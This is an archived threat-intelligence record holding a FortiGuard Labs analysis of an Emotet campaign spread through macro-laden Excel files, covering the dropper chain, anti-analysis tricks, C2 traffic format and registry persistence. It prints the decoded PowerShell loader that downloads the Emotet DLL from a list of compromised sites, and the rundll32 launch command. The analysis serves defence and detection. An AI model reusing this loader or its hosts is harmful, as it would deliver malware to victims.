{
	"id": "ff4f06dc-5862-40ed-9a99-4de6a5e34b6b",
	"created_at": "2026-04-06T00:18:44.778632Z",
	"updated_at": "2026-04-10T13:12:18.191764Z",
	"deleted_at": null,
	"sha1_hash": "fadf927d266a91ccf53350360e0efa7a3f0b81fd",
	"title": "MS Office Files Involved Again in Recent Emotet Trojan Campaign – Part I | FortiGuard Labs",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 559871,
	"plain_text": "MS Office Files Involved Again in Recent Emotet Trojan Campaign –\r\nPart I | FortiGuard Labs\r\nBy Xiaopeng Zhang\r\nPublished: 2022-03-07 · Archived: 2026-04-05 20:25:48 UTC\r\nRecently, Fortinet’s FortiGuard Labs captured more than 500 Microsoft Excel files that were involved in a campaign to\r\ndeliver a fresh Emotet Trojan onto the victim’s device.\r\nEmotet, known as a modular Trojan, was first discovered in the middle of 2014. Since then, it has become very active,\r\ncontinually updating itself. It has also been highlighted in cybersecurity news from time to time. Emotet uses social\r\nengineering, like email, to lure recipients into opening attached document files (including Word, Excel, PDF, etc.) or\r\nclicking links within the content of the email that download Emotet’s latest variant onto the victim’s device and then execute\r\nit.\r\nOur FortiGuard Labs team has monitored Emotet Trojan campaigns in the past and posted numerous technical analysis\r\nblogs.\r\nThis time, I grabbed an Excel file from the captured samples and conducted deep research on this campaign. In this part I of\r\nmy analysis, you can expect to learn: how an Excel file is leveraged to spread Emotet, what anti-analysis techniques Emotet\r\nuses in this variant, how it maintains persistence on a victim’s device, how this Emotet variant communicates with its C2\r\nserver, and how other modules are delivered, loaded, and executed on a victim’s system.\r\nAffected platforms: Microsoft Windows\r\nImpacted parties: 64-bit Windows Users\r\nImpact: Controls victim’s device and collects sensitive information\r\nSeverity level: Critical\r\nLooking into the Excel File\r\nFigure 1.1 – The Excel file is opened in the MS Excel program\r\nI have set my Excel’s macro option to \"Disable all macros with notification\" in \"Macro Settings.\" That’s why it shows the\r\nyellow “Security Warning” bar when an opened Excel file contains a Macro, as shown in Figure 1.1. 
This image shows the\r\nfake message used to lure a victim into clicking the “Enable Content” button to view the protected content of the Excel file.\r\nThe malicious Macro has a function called “Workbook_Open()” that is executed automatically in the background when the\r\nExcel file opens. It calls other local functions to write data to two files: \"uidpjewl.bat\" and \"tjspowj.vbs\" in the\r\n“C:\\ProgramData\\” folder. The written data is read out from multiple cells of this Excel file. In the end, the Macro executes\r\nthe \"tjspowj.vbs\" file with “wscript.exe.” Refer to Figure 1.2 for more information. \r\nhttps://www.fortinet.com/blog/threat-research/ms-office-files-involved-in-emotet-trojan-campaign-pt-one\r\nPage 1 of 10\n\nFigure 1.2 – VBA code in Macro used to execute the extracted \"tjspowj.vbs\" file\r\nVBS and PowerShell\r\nThe code in “tjspowj.vbs” is obfuscated. See Figure 2.1. The top part is the original code and the bottom part is the\r\nnormalized code.\r\nFigure 2.1 – VBS code in “tjspowj.vbs”\r\nThe code is very simple. It runs the early extracted “uidpjewl.bat” file, which downloads the Emotet payload file.\r\n“uidpjewl.bat” file is a DOS batch file containing the PowerShell code, which is encoded many times. 
To better understand\r\nits intention, I have decoded it below:\r\n$MJXdfshDrfGZses4=\"hxxps://youlanda[.]org/eln-images/n8DPZISf/,hxxp://rosevideo[.]net/eln-images/EjdCoMlY8Gy/,hxxp://vbaint[.]com/eln-images/H2pPGte8XzENC/,hxxps://framemakers[.]us/eln-images/U5W2IGE9m8i9h9r/,hxxp://niplaw[.]com/asolidfoundation/yCE9/,http://robertmchilespe[.]com/cgi/3f/,http://vocoptions[.]net/cgi/ifM9R5ylbVpM\r\nfonts/JO5/,http://robertflood[.]us/eln-images/DGI2YOkSc99XPO/,http://mpmcomputing[.]com/fonts/fJJrjqpIY3Bt3Q/,http://dadsgetinthegame[.]com/eln-images/tAAUG/,http://smbservices[.]net/cgi/JO01ckuwd/,http://stkpointers[.]com/eln-images/D/,hxxp://rosewoodcraft[.]com/Merchant2/5.00/PGqX/\".sPLIt(\",\");\r\nfoReACh($yIdsRhye34syufgxjcdf iN $MJXdfshDrfGZses4){\r\n$GweYH57sedswd=(\"c:\\programdata\\puihoud.dll\");\r\ninvoke-webrequest -uri $yIdsRhye34syufgxjcdf -outfile $GweYH57sedswd;\r\niF(test-path $GweYH57sedswd) {\r\nif((get-item $GweYH57sedswd).length -ge 47436) { break; }\r\n}\r\n}\r\nIt tries to download Emotet (into a local file, \"c:\\programdata\\puihoud.dll\", that is hardcoded in the PowerShell) from a\r\ngroup of websites until any download is successfully completed.\r\nMeanwhile, the caller “tjspowj.vbs” file takes responsibility for running the downloaded Emotet with the command \"cmd /c\r\nstart /B c:\\windows\\syswow64\\rundll32.exe c:\\programdata\\puihoud.dll,tjpleowdsyf\".\r\n“C:\\Windows\\SysWOW64\\” is a system folder created by Microsoft for storing 32-bit files. “WOW64” is the x86 emulator\r\nthat allows 32-bit Windows applications to run on 64-bit Windows. It only exists in 64-bit architecture Windows. In other\r\nwords, although the downloaded Emotet file was compiled for 32-bit architecture, this variant only affects 64-bit Windows\r\nusers. 
It terminates execution and pops up an error message when it runs on a 32-bit Windows because the file is not found.\r\n“rundll32.exe” is a system file that loads and runs 32-bit dynamic-link library (DLL) files. It uses the command line syntax\r\n“rundll32.exe DLLname,\u003cExport Function\u003e”, where the “Export Function” is optional. “puihoud.dll” is the DLL name for\r\nthis Emotet and the subsequent export function name (“tjpleowdsyf”) is a random string. In an analysis tool, I found it only\r\nhas one export function, called “DllRegisterServer()”. Let’s see what happens with a random export function.\r\nStart Emotet in Rundll32\r\nOnce the Emotet file (“puihoud.dll”) is loaded by “rundll32.exe”, its entry point function is called the very first time. It then\r\ncalls the DllMain() function where it loads and decrypts a 32-bit Dll into its memory from a “Resource” named “HITS”. The\r\ndecrypted Dll is the core of this Emotet, which will be referred to as “X.dll” in this analysis due to a hardcoded constant\r\nstring in its code, as shown below.\r\n10024030 ; Export Ordinals Table for X.dll       \r\n10024032 aX_dll          db 'X.dll',0            \r\n10024038 aDllregisterser db 'DllRegisterServer',0\r\nFigure 3.1 – Decrypt function and the decrypted X.dll\r\nFigure 3.1 shows the relevant functions used to decrypt and deploy the decrypted “X.dll”, which is in memory. The\r\nEntryPoint() function of “X.dll” is called after its deployment.\r\n“X.dll” checks if the export function name from the command line parameter is “DllRegisterServer”. If not, it runs the\r\ncommand line again with “DllRegisterServer” instead of the random string, like \"C:\\Windows\\system32\\rundll32.exe\r\nc:\\programdata\\puihoud.dll,DllRegisterServer\" (see step 1 \u0026 2 in Figure 3.3). It then calls ExitProcess() to exit the first\r\n“rundll32.exe”. 
In Figure 3.2 it is about to call the API CreateProcessW() to run the new command.\r\nFigure 3.2 – “X.dll” starts “puihoud.dll” with “DllRegisterServer”\r\nFigure 3.3 – Work flow of Emotet to reach its core code\r\nWhen Emotet is running with the “DllRegisterServer” export function, it will normally exit from X.dll’s EntryPoint() as well\r\nas puihoud.dll’s EntryPoint() (step 3 in Figure 3.3). Next, rundll32 calls the API GetProcAddress() to gather the export\r\nfunction “DllRegisterServer” from “puihoud.dll” and call it. Finally, puihoud.dll!DllRegisterServer calls X.dll!\r\nDllRegisterServer() (step 4 in Figure 3.3).\r\nThis is also pretty much the way rundll32.exe loads and runs a dll file with an export function.\r\nX.dll!DllRegisterServer() is the real starting point for executing malicious things on the victim’s device.\r\nAnti-Analysis Techniques\r\nTo protect its code from being analyzed, Emotet uses anti-analysis techniques. In this section I will explain what kinds of\r\nsuch techniques this variant uses.\r\nCode Flow is Obfuscated\r\nIn most functions, it mixes the code flow with lots of “goto” statements. It has a local variable, called “switch_number” by\r\nme, that holds a dynamic number to control how it executes the code.\r\nThe logic is that all codes are enclosed in a “while infinite loop” statement, which determines which code flow to enter\r\n(“goto”) according to the value of “switch_number”. 
And “switch_number” is modified each time after being used, then\r\nonce the code branch task is finished it goes back to the “while” statement to check the “switch_number” again.\r\nThis technique really causes trouble for security researchers trying to analyze the function’s intention and trace its code.\r\nFigure 4.1 is a pseudo code in C that reveals the obfuscated code flow.\r\nFigure 4.1 – Pseudo code of obfuscated code flow\r\nStrings are Encrypted\r\nAll constant strings are encrypted and are only decrypted just before being used. The constant strings are usually very useful\r\nhints for researchers to quickly locate the key point of the malware.\r\nConstant Numbers are Obfuscated\r\nNormally, the constant numbers are useful to researchers for guessing the code’s purpose. Here is an example. The\r\ninstruction “mov [esp+2ACh+var_1A0], 2710h” has been obfuscated, as seen in the three instructions below.\r\nmov     [esp+2ACh+var_1A0], 387854h\r\nor      [esp+2ACh+var_1A0], 0F1FDFF8Dh\r\nxor     [esp+2ACh+var_1A0], 0F1FDD8CDh\r\nAll APIs are hidden\r\nThe APIs are obtained using a hash code of both the API name and the module name that the function belongs to. Each time\r\nEmotet needs to call an API, it calls a local function to obtain it in the EAX register and then calls it. Figure 4.2 is an\r\nexample of calling API GetCommandLineW(), where 0xB03E1C69 is the hash code of module “kernel32” and 0x4543B55E\r\nis the hash code of “GetCommandLineW”.\r\nFigure 4.2 – Getting the API GetCommandLineW() and invoking it\r\nCommunicating with the C2 Server\r\nOnce Emotet finishes collecting the basic information from the victim’s device, it calls the API BCryptEncrypt() to encrypt\r\nthe data. 
Let’s look at the kind of data contained in the collected data, as shown in Figure 5.1.\r\nFigure 5.1 – Collected basic data to encrypt\r\nThe 60H bytes data in memory is the plaintext data to be encrypted. Let me explain what most of the data is.\r\n0x20, at offset+4, is the size of sha256 hash code followed, which includes the bytes starting from offset+8 to offset+0x27\r\n(A0 C9 … 68 F8). That is a sha256 hash code of the entire following data, starting at offset+28h.\r\n0x2C, at offset+28h, is the size of the following data. The next 0x10 is the length of the victim’s ID\r\n(“BOBSXPC_9C09B592”), which is a combination of the computer name and the system driver’s volume number. To\r\nobtain this information, Emotet calls APIs like GetComputerName(), GetWindowsDirectoryW(), and\r\nGetVolumeInformationW().\r\nThe following dword 0x29C220DD is a hash code of Emotet Dll’s full path. 0x13465AA is a constant value defined in its\r\ncode. It may be a malware ID of this Emotet. 0x2710 is another constant value, and I suppose it is a sort of version of this\r\nvariant. 0x19E7D is a combination of the victim’s system information, including Windows version, architecture, and so on.\r\nTo get this information it needs to call APIs RtlGetVersion() and GetNativeSystemInfo(). 0x01 at offset+50h is a current\r\nprocess ID (rundll32.exe) related value.\r\nThe last data, starting at offset+58h, is meaningless padding (AB AB AB…).\r\nThe encrypted binary data will be converted into base64 string by calling the API CryptBinaryToStringW(). The base64\r\nstring is submitted to the C2 server as a “Cookies” value in an HTTP Get request. 
\r\nFigure 5.2 – Sending encrypted data to C2 server\r\nIn the example shown in Figure 5.2, as you may have noticed, the Cookie name and URL are randomized by Emotet to\r\nbypass the cybersecurity device’s detection.\r\nIn total, there are 49 C2 servers (IP address and port) hardcoded and encrypted within this variant. Please refer to the “C2\r\nServer List” under the “IOCs” section for all the IP addresses and ports.\r\nThe C2 server detects the submitted data to determine next steps, including replying with Emotet modules and commands\r\nfor further actions.\r\nThe replied data is encrypted binary data in the HTTP response body. In Figure 5.3, below, the marked box is an example of\r\nthe data just after decryption.\r\nFigure 5.3 – The decrypted C2 response data\r\nThe decrypted data is 60H long and contains both verification data and control data.\r\n0x40 at the beginning is the size of the verification data, the signature data (31 1B … 3C 6D), which is a signed hash of the\r\ncontrol data. The received data must pass verification, otherwise it drops the packet. The control data starts from offset+54H\r\nto the end. 0x8 is the size of the following data. The control data in this packet is two dword numbers — 0x00.\r\nThe first 0x00 is a flag that can be 0, 1, or 8.\r\nIf the flag is 8, Emotet will uninstall itself from the victim’s device, including removing the auto-run item from system\r\nregistry, deleting the file(s) or folder(s) it created, as well as deleting the Emotet Dll file.\r\nIf the flag is 0 and the second dword is not 0 (it should be the size of the attached module to this packet), it executes the\r\nmodule on the victim’s device.\r\nIf the flag is 1, it goes to the flag 0’s branch. 
I’ll explain this part in more detail in the next part of this analysis.\r\nRelocate and Persistent\r\nOnce Emotet receives a valid response from the C2 server, it relocates the downloaded Emotet dll file from\r\n“C:\\Windows\\ProgramData\\puihoud.dll” (in my analysis environment) into the “%LocalAppData%” folder.  Moreover, to\r\nremain in the victim’s device, Emotet makes itself persistent by adding the relocated file into the auto-run group in the\r\nsystem registry. Emotet is then able to run at system startup. Figure 6.1 is a screenshot of the Registry Editor displaying the\r\nauto-run item in the system registry.\r\nFigure 6.1 – Added auto-run item in the system registry.\r\nConclusion\r\nIn this post we have walked through the malicious Macro within a captured Excel file, which downloads Emotet via two\r\nextracted files, \"uidpjewl.bat\" and \"tjspowj.vbs\".\r\nWe then went through how the downloaded Emotet Dll file is run in a rundll32.exe process as well as how it extracts the\r\nEmotet core X.dll from its “Resource”.\r\nI also explained what kinds of anti-analysis techniques this Emotet uses to protect its code from being analyzed.\r\nAnd finally, I elaborated on what kind of data Emotet collects from the victim’s system and how the binary data is encrypted\r\nand converted into base64 string and finally submitted to its C2 server via an HTTP packet.\r\nIn the next part of this analysis, I will focus on those returned modules from Emotet’s C2 server and how they are executed\r\nby Emotet, as well as what sensitive data they are able to steal from the victim’s device.\r\nPlease stay tuned.\r\nFortinet Protections\r\nFortinet customers are already protected from this malware by FortiGuard’s Web Filtering, AntiVirus, FortiMail, FortiClient,\r\nFortiEDR, and CDR (content disarm and reconstruction) services, as follows:\r\nThe malicious 
Macro inside the Excel sample can be disarmed by the FortiGuard CDR (content disarm and reconstruction)\r\nservice.\r\nAll relevant URLs have been rated as \"Malicious Websites\" by the FortiGuard Web Filtering service.\r\nThe captured Excel sample and the downloaded Emotet dll file are detected as \"VBA/Emotet.2826!tr.dldr \" and \"\r\nW32/Emotet.B185!tr\" and are blocked by the FortiGuard AntiVirus service.\r\nFortiEDR detects both the Excel file and Emotet dll file as malicious based on its behavior.\r\nIn addition to these protections, we suggest that organizations have their end users also go through the FREE NSE\r\ntraining: NSE 1 – Information Security Awareness. It includes a module on Internet threats that is designed to help end users\r\nlearn how to identify and protect themselves from phishing attacks.\r\nIOCs\r\nURLs Involved in the Campaign:\r\nC2 Server List in this Variant: (49 in total)\r\nSample SHA-256 Involved in the Campaign:\r\n[Excel files Captured]\r\n[puihoud.dll (the downloaded Emotet)]\r\nLearn more about Fortinet’s FortiGuard Labs threat research and intelligence organization and the FortiGuard Security\r\nSubscriptions and Services portfolio.\r\nRead part II of our analysis to learn more about malicious modules involved and how to avoid this lure.\r\nSource: https://www.fortinet.com/blog/threat-research/ms-office-files-involved-in-emotet-trojan-campaign-pt-one",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.fortinet.com/blog/threat-research/ms-office-files-involved-in-emotet-trojan-campaign-pt-one"
	],
	"report_names": [
		"ms-office-files-involved-in-emotet-trojan-campaign-pt-one"
	],
	"threat_actors": [],
	"ts_created_at": 1775434724,
	"ts_updated_at": 1775826738,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/fadf927d266a91ccf53350360e0efa7a3f0b81fd.pdf",
		"text": "https://archive.orkl.eu/fadf927d266a91ccf53350360e0efa7a3f0b81fd.txt",
		"img": "https://archive.orkl.eu/fadf927d266a91ccf53350360e0efa7a3f0b81fd.jpg"
	}
}